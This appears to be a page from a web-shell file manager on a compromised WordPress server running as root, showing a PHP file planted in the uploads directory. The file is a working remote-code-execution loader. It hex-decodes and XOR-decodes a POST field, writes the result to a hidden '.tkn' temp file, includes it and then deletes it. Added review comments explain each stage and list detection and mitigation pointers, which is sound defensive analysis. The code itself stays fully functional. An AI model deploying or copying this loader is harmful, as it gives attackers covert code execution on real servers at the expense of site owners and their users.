HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux wordpress-ubuntu-s-2vcpu-4gb-fra1-01 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/shoetique/wp-content/uploads/2020/04/layout.up.php
<?php

// NOTE(review): this block is a staged remote-code-execution loader (web-shell stub).
// Any request carrying a POST field named "flg" has that field decoded, written to a
// temporary file and executed via include. No authentication or origin check is visible
// in this file, so the only "secret" is knowledge of the field name and the encoding.
// Detection pointers for defenders: POST bodies to this script with a long hex-only
// "flg" value; short-lived files named ".tkn" in temp/session directories; PHP include
// activity from /dev/shm, /tmp or /var/tmp; a .php file living under wp-content/uploads.
// Mitigation pointers: deny PHP execution in upload directories, constrain include paths
// (e.g. open_basedir), and do not run the PHP worker as root (the panel header above
// reports "User: root (0)").
if(in_array("flg", array_keys($_POST))){
	// Stage 1: the field is expected to be hex text; hex2bin() turns it into raw bytes.
	$parameter_group = hex2bin($_POST["flg"]);
	// Stage 2: every byte is XORed with the constant 83 (0x53). This is single-byte
	// obfuscation of the payload in transit, not encryption; $bind ends up holding the
	// decoded payload that is later executed.
	$bind =    '' ; foreach(str_split($parameter_group) as $char){$bind .= chr(ord($char) ^ 83);}
	// Candidate drop directories, in the order they are tried. array_filter() with no
	// callback discards entries that evaluate to false (e.g. unset ini/env values).
	$ptr = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TMP"), getenv("TEMP"), "/tmp", sys_get_temp_dir(), "/var/tmp", getcwd()]);
	for ($elem = 0, $dchunk = count($ptr); $elem < $dchunk; $elem++) {
    $object = $ptr[$elem];
    		// Only directories that exist and are writable by the PHP process are used.
    		if (!!is_dir($object) && !!is_writable($object)) {
    // Fixed drop-file name: "<dir>/.tkn" (dot-prefixed, so hidden from a plain `ls`).
    $desc = vsprintf("%s/%s", [$object, ".tkn"]);
    $file = fopen($desc, 'w');
if ($file) {
	// The decoded payload is written to disk ...
	fwrite($file, $bind);
	fclose($file);
	// ... executed as PHP in the context of this request ...
	include $desc;
	// ... and removed straight away; "@" suppresses any unlink error. The file therefore
	// exists only for the duration of the include, which limits on-disk forensic traces.
	@unlink($desc);
	// Stop after the first directory that worked.
	exit;
}
}
}
}